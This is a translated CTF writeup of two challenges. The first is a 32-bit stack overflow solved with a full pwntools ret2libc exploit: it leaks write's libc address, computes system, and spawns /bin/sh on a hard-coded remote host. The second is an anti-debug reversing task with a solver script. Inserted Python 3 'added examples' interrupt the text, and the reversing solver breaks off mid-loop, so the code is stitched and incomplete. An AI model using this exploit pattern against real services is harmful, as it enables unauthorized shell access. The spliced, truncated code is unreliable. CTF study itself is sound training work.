
Writeups for a few CTF challenges

合天网安实验室, published 2018-08-27 20:15:00

0x01 PlainR2B

This is a fairly simple PWN challenge. First the binary was loaded into IDA for a quick look at the program, as shown in the figure.

The binary has no stack protection, so the 0x34-byte read() in game() can overwrite game's saved return address. The first pass returns into write(1, write@got, 4), with game's own address as write's return address: the program prints write's libc address and then runs the game again. From that leak the address of system is computed (the offset between write and system is fixed inside libc-2.23.so). On the second pass the name "/bin/sh\0" is stored at 0x804A06C, and the return address is replaced with system, with 0x804A06C as its argument, which gives a shell.

The Python (pwntools, Python 2) exploit is as follows:

from pwn import *

def rungameAgainPoc(p, yourname, flag):
    # One round of the game: the name is stored at 0x804A06C, the
    # "flag" answer is read with read(0, buf, 0x34) and overflows the frame.
    p.recvuntil("First, what's your name?\n")
    p.send(yourname + "\n")
    p.recvuntil("do you want to get flag?\n")
    p.send(flag)

pwnelf = ELF("./pwn")
libcelf = ELF("./libc-2.23.so")

gameadd = 0x080485CB            # game(); used as the fake return address so the loop runs again
plt_write = pwnelf.symbols['write']
got_write = pwnelf.got['write']

# p = process('./pwn', env={'LD_PRELOAD': './libc-2.23.so'})
p = remote('117.50.60.184', 12345)

# Round 1: 32 bytes of padding, then return into write@plt with game() as
# write's return address and the arguments (1, write@got, 4): leaks write's libc address.
rungameAgainPoc(p, "ichuqiu", "0" * 32 + p32(plt_write) +
                p32(gameadd) + p32(1) + p32(got_write) + p32(4))
write_addr = u32(p.recv(4))
print "pwn write ", hex(write_addr)

# The distance between write and system is fixed inside libc-2.23.so
libcelf_system_add = (libcelf.symbols["system"] +
                      write_addr - libcelf.symbols["write"])
print "pwn libcelf_system_add", hex(libcelf_system_add)

# Round 2: the name "/bin/sh\0" lands at 0x804A06C; return into system()
# with that address as its argument (game() again as the fake return address).
rungameAgainPoc(p, "/bin/sh\0", "0" * 32 +
                p32(libcelf_system_add) + p32(gameadd) + p32(0x804A06C))
p.interactive()

flag{62c51c85-1516-4ad8-989c-58ce8c29642e}
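As an added example that is not part of the original writeup, the following Python 3 script models the two PlainR2B payloads offline (no target needed): it checks that each payload fits in the 0x34-byte read, decodes the overwritten frame the way the CPU will consume it, and performs the libc rebasing with the page-alignment sanity check that catches a wrong libc or a wrong symbol. The write@plt, write@got, libc offsets and the leaked value used below are constructed placeholder numbers, not values taken from the challenge binary.

```python
import struct

READ_LEN = 0x34          # read(0, buf, 0x34) in game(): the overflow budget
PADDING = 32             # bytes from the start of buf to the saved return address
GAME_ADDR = 0x080485CB   # game(), reused as the fake return address
NAME_BUF = 0x804A06C     # global buffer holding the name ("/bin/sh\0" on round 2)


def p32(v):
    """Little-endian 32-bit pack, like pwntools' p32."""
    return struct.pack("<I", v & 0xffffffff)


def leak_payload(plt_write, got_write, ret=GAME_ADDR):
    """Round 1: return into write(1, write@got, 4), then back into game()."""
    payload = (b"0" * PADDING + p32(plt_write) + p32(ret)
               + p32(1) + p32(got_write) + p32(4))
    if len(payload) > READ_LEN:
        raise ValueError("payload longer than the 0x34-byte read")
    return payload


def resolve_system(leaked_write, libc_write_off, libc_system_off):
    """Rebase libc from the leaked write address and return system's address.

    The library base must be page aligned; if it is not, the leak was not
    produced by the libc whose offsets we are using (or the wrong symbol leaked).
    """
    base = leaked_write - libc_write_off
    if base & 0xfff:
        raise ValueError("leak does not page-align with this libc: wrong libc or symbol")
    return base + libc_system_off


def shell_payload(system_addr, binsh_addr=NAME_BUF, ret=GAME_ADDR):
    """Round 2: return into system(binsh_addr); ret is what system returns to."""
    payload = b"0" * PADDING + p32(system_addr) + p32(ret) + p32(binsh_addr)
    if len(payload) > READ_LEN:
        raise ValueError("payload longer than the 0x34-byte read")
    return payload


def frame_after_overflow(payload):
    """Decode the overwritten frame: (return address, next return address, [args...])."""
    words = struct.unpack("<%dI" % ((len(payload) - PADDING) // 4), payload[PADDING:])
    return words[0], words[1], list(words[2:])


if __name__ == "__main__":
    # Constructed placeholder values (hypothetical, not from the real binary/libc).
    PLT_WRITE, GOT_WRITE = 0x08048380, 0x0804A014
    LIBC_WRITE_OFF, LIBC_SYSTEM_OFF = 0x0D43C0, 0x03A940
    leaked = 0xF7E3C3C0
    print(frame_after_overflow(leak_payload(PLT_WRITE, GOT_WRITE)))
    system = resolve_system(leaked, LIBC_WRITE_OFF, LIBC_SYSTEM_OFF)
    print(hex(system), frame_after_overflow(shell_payload(system)))
```

The leak payload uses all 52 bytes of the read exactly: 32 bytes of padding, the return address, the fake return address, and three arguments. Anything longer would be silently truncated by read(), which is why the length check sits in the builder rather than in the caller.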

0x02 Antidbg

Searching for the key function in IDA turns up a loop that compares the input.

A first look suggests the input is an 8-digit number, so the comparison is done in separate parts.

# Stack values compared by the loop, as IDA displays them (multi-byte constants are
# shown as big-endian numbers, so they must be byte-reversed to get memory order):
# [ebp+var_6C] 01050D02070106010206000B07010C06
# [ebp+var_4C] 02080602
# [ebp+var_5C] 0100070D020108080D000103040D0303
# [ebp+var_48] 02050009
# [ebp+var_44] 00000D02

def cover(buf):
    # Decode a hex string and reverse its bytes (IDA display order -> memory order).
    buf = buf.decode("hex")
    rbuf = ""
    for i in range(len(buf) - 1, -1, -1):
        rbuf += buf[i]
    return rbuf

def cover_hex_lines(buf):
    # Turn a multi-line IDA hex dump into raw bytes.
    return buf.replace(" ", "").replace("\r", "").replace("\n", "").decode("hex")

# The five stack slots are contiguous (var_6C .. var_44), so join them in memory order.
var_6c = (cover("01050D02070106010206000B07010C06")
          + cover("0100070D020108080D000103040D0303")
          + cover("02080602") + cover("02050009")
          + cover("00000D02"))
# print len(var_6c)

byte_402178 = cover_hex_lines("""02 02 02 02 03 01 01 02
01 01 02 01 01 00 01 01  02 02 00 01 01 01 01 00
01 01 02 02 00 01 01 02  02 01 01 01 01 01 02 01
01 03 00 00 00 00 00 00  00 00 00 00 00 00 00 00
03 03 0D 04 03 01 00 0D  08 08 01 02 0D 07 00 01
06 0C 01 07 0B 00 06 02  01 06 01 07 02 0D 05 01
00 00 00 00 EF 28 68 5B  00 00 00 00 02 00 00 00
48 00 00 00 E4 22 00 00  E4 16 00 00 00 00 00 00
EF 28 68 5B 00 00 00 00  0C 00 00 00 14 00 00 00
2C 23 00 00 2C 17 00 00  00 00 00 00 EF 28 68 5B
00 00 00 00 0D 00 00 00  54 02 00 00 40 23 00 00
40 17 00 00 00 00 00 00  EF 28 68 5B 00 00 00 00
0E 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
A0 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 30 40 00
E0 22 40 00 01 00 00 00  E8 20 40 00 00 00 00 00
00 00 00 00 00 00 00 00  00 01 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00""")

byte_402138 = cover_hex_lines("""00 00 00 00 01 00 00 00
02 00 00 00 03 00 00 00  04 00 00 00 05 00 00 00
06 00 00 00 07 00 00 00  08 00 00 00 09 00 00 00
0A 00 00 00 0B 00 00 00  0C 00 00 00 0D 00 00 00
0E 00 00 00 0F 00 00 00""")

dword_403018 = cover_hex_lines("""02 00 00 00 02 00 00 00
02 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00
""")

# .text:0040110E                mov     ecx, [ebp+var_4]
# .text:00401111                xor     ecx, ebp
# .text:00401113                mov     dword_40301C, 3
# .text:0040111D                mov     dword_403020, 6
# .text:00401127                mov     dword_403024, 7
# The table is modified in memory at run time (the three stores above), so the
# static copy from the binary has to be patched before it is used.
dword_403018 = (dword_403018[0:4] + '\x03' + dword_403018[5:8]
                + '\x06' + dword_403018[9:12] + '\x07'
                + dword_403018[13:])
print dword_403018.encode("hex")

for i in range(0, 42):
    # byte_402178[i] selects a dword of the patched table; its low byte is the high part
    hightnum = ord(dword_403018[ord(byte_402178[i]) * 4])
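As an added example that is not part of the original writeup: the point of the patch above is that a table IDA shows as static data is overwritten before the comparison loop runs, so any solver built from the on-disk bytes must replay those stores first. The Python 3 script below generalizes the hand-edited slice: it parses the `dword_403018` dump and the `mov dword_XXXX, imm` lines from the listing above, replays each store at the right offset, rejects stores that fall outside the table, and reproduces the first lookup of the loop. The listing text is constructed from the lines quoted in the writeup; the function names are the example's own.

```python
import re
import struct

# Static copy of dword_403018 as the binary stores it (from the writeup's dump).
DWORD_403018_BASE = 0x403018
DWORD_403018_DUMP = """02 00 00 00 02 00 00 00
02 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00"""

# Listing fragment constructed from the writeup; only the stores to dword_* matter.
RUNTIME_LISTING = """
.text:0040110E                mov     ecx, [ebp+var_4]
.text:00401111                xor     ecx, ebp
.text:00401113                mov     dword_40301C, 3
.text:0040111D                mov     dword_403020, 6
.text:00401127                mov     dword_403024, 7
"""

STORE_RE = re.compile(r"mov\s+dword_([0-9A-Fa-f]+),\s*([0-9A-Fa-f]+h?)")


def parse_ida_dump(text):
    """Turn a whitespace-separated IDA hex dump into bytes."""
    return bytes.fromhex(re.sub(r"\s+", "", text))


def parse_imm(tok):
    """IDA writes immediates as decimal, or as hex with an 'h' suffix (e.g. 0Ah)."""
    return int(tok[:-1], 16) if tok.lower().endswith("h") else int(tok, 10)


def apply_runtime_stores(table, base, listing):
    """Replay every 'mov dword_XXXX, imm' in the listing onto a static table copy."""
    patched = bytearray(table)
    for m in STORE_RE.finditer(listing):
        addr, imm = int(m.group(1), 16), parse_imm(m.group(2))
        off = addr - base
        if not 0 <= off <= len(patched) - 4:
            raise ValueError("store to %#x lies outside the table" % addr)
        patched[off:off + 4] = struct.pack("<I", imm)   # x86: little-endian dword
    return bytes(patched)


def patched_table():
    """dword_403018 as the comparison loop actually sees it."""
    return apply_runtime_stores(parse_ida_dump(DWORD_403018_DUMP),
                                DWORD_403018_BASE, RUNTIME_LISTING)


def table_lookup(table, index_byte):
    """First step of the loop: byte_402178[i] selects a dword, its low byte is used."""
    return table[index_byte * 4]


if __name__ == "__main__":
    t = patched_table()
    print(t.hex())
    print([table_lookup(t, i) for i in range(4)])
```

Replaying the stores from the listing instead of hand-editing slice offsets keeps the solver honest if more stores turn up later in the function: each new `mov dword_*, imm` line is just appended to the listing, and an out-of-range store is reported rather than silently corrupting a neighbouring global.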
